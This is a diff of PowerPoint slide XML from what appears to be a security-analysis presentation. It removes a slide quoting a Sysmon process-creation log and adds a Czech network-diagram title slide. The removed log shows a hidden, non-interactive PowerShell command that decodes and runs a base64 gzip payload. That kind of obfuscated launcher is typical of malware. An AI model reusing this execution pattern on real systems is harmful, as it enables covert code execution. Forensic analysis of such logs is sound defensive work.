-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>FileVersion</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: 10.0.17134.1 (WinBuild.160101.0800)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Description: Console Window Host</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Product: Microsoft? Windows? Operating System</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Company: Microsoft Corporation</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>CommandLine</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: \??\C:\WINDOWS\system32\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>conhost.exe 0xffffffff -ForceV1</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>CurrentDirectory</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: C:\WINDOWS</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>User: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>PC2\user</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>IntegrityLevel</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: High</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Hashes: SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>ParentImage</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>ParentCommandLine</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>: ""</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>powershell.exe</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>"" -noni -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>nop</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t> -w </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>hidden</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t> -c &amp;([</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>scriptblock</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>]::create((New-Object </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>IO.StreamReader</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>(New-Object </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>IO.Compression.GzipStream</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>((New-Object </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>IO.MemoryStream</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>(,[Convert]::FromBase64String('H4sIAFuWmlwCA7VW/W+iSBj+uU36P5CNiZBaRWu7vSabHCAornRlUbR65kJhhFkHcGGo4t7+7/eOQLebbe92LzlCwny8n8/7zLyss8ilOI44/5r7cnZ6MnYSJ+T42mZ+3eBqIRZOTmC1Fut2yr3j+KW03fbi0MHR6vZWyZIERbSYN/uISmmKwgeCUcoL3F/cLEAJuvjw8Am5lPvC1f5s9kn84JBSLFccN0DchRR5bG8Uuw6LpGltCaZ8/+VTc79RPrZ2Kh7tN+/aUbV0e7uAIOHA7m6aIxT5NGiI+0tRhN4i7rsi5PjzaSnxNufBUIN1pgKWwjA5GhbY+a2lgTf/P8Eq74wAPt6/gvVt7R92fwpAsVEm/MP69wu/BOgvpj5zMAU5C649gorW+woCJTOe/Z2wskDl1+XDfi8/ZPTiDn5azk7/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>BrreYUTFCgAA</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>'))),[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>IO.Compression.CompressionMode</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>]::Decompress))).</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>ReadToEnd</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>()))";"1";"5";;"4";"1";"0";"-9223372036854775808";"589779";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:44";;;"Microsoft-Windows-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>Sysmon</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"Process Create (rule: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>ProcessCreate</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>System.String</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>]";"System.Collections.Generic.List`1[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" dirty="0">
-                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
-                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
-              </a:rPr>
-              <a:t>]"</a:t>
-            </a:r>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -6716,27 +6772,569 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="0" y="1"/>
-            <a:ext cx="12192000" cy="585926"/>
+            <a:off x="8041742" y="648930"/>
+            <a:ext cx="3461281" cy="3347337"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="90000"/>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
+            <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>POWERSHELL PROCESS</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+            <a:pPr algn="r"/>
+            <a:r>
+              <a:rPr lang="en-US" sz="4800"/>
+              <a:t>SCHÉMA SÍTĚ</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:grpSp>
+        <p:nvGrpSpPr>
+          <p:cNvPr id="51" name="Group 37">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AC26FF4-D6F9-4A94-A837-D051A101EDD3}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvGrpSpPr>
+            <a:grpSpLocks noGrp="1" noUngrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1"/>
+          </p:cNvGrpSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvGrpSpPr>
+        <p:grpSpPr>
+          <a:xfrm>
+            <a:off x="886714" y="-4763"/>
+            <a:ext cx="5014912" cy="6862763"/>
+            <a:chOff x="2928938" y="-4763"/>
+            <a:chExt cx="5014912" cy="6862763"/>
+          </a:xfrm>
+        </p:grpSpPr>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="39" name="Freeform 6">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFFE501B-F9EC-4229-99D6-F39E38A71B5B}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="3367088" y="-4763"/>
+              <a:ext cx="1063625" cy="2782888"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="670" h="1753">
+                  <a:moveTo>
+                    <a:pt x="0" y="1696"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="225" y="1753"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="670" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="430" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="1696"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="accent1"/>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="40" name="Freeform 7">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B064C6A0-3DE4-4F4A-B650-78A628163E0A}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="2928938" y="-4763"/>
+              <a:ext cx="1035050" cy="2673350"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="652" h="1684">
+                  <a:moveTo>
+                    <a:pt x="225" y="1684"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="652" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="411" y="0"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="1627"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="219" y="1681"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="225" y="1684"/>
+                  </a:lnTo>
+                  <a:close/>
+                </a:path>
+              </a:pathLst>
+            </a:custGeom>
+            <a:solidFill>
+              <a:schemeClr val="tx1">
+                <a:lumMod val="65000"/>
+                <a:lumOff val="35000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="41" name="Freeform 25">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43CD3E83-3D0D-40EE-B1A2-9C989EBF2814}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr bwMode="auto">
+            <a:xfrm>
+              <a:off x="2928938" y="2582862"/>
+              <a:ext cx="2693987" cy="4275138"/>
+            </a:xfrm>
+            <a:custGeom>
+              <a:avLst/>
+              <a:gdLst/>
+              <a:ahLst/>
+              <a:cxnLst/>
+              <a:rect l="0" t="0" r="r" b="b"/>
+              <a:pathLst>
+                <a:path w="1697" h="2693">
+                  <a:moveTo>
+                    <a:pt x="0" y="0"/>
+                  </a:moveTo>
+                  <a:lnTo>
+                    <a:pt x="1622" y="2693"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="1697" y="2693"/>
+                  </a:lnTo>
+                  <a:lnTo>
+                    <a:pt x="0" y="0"/>
+                  </a:lnTo>
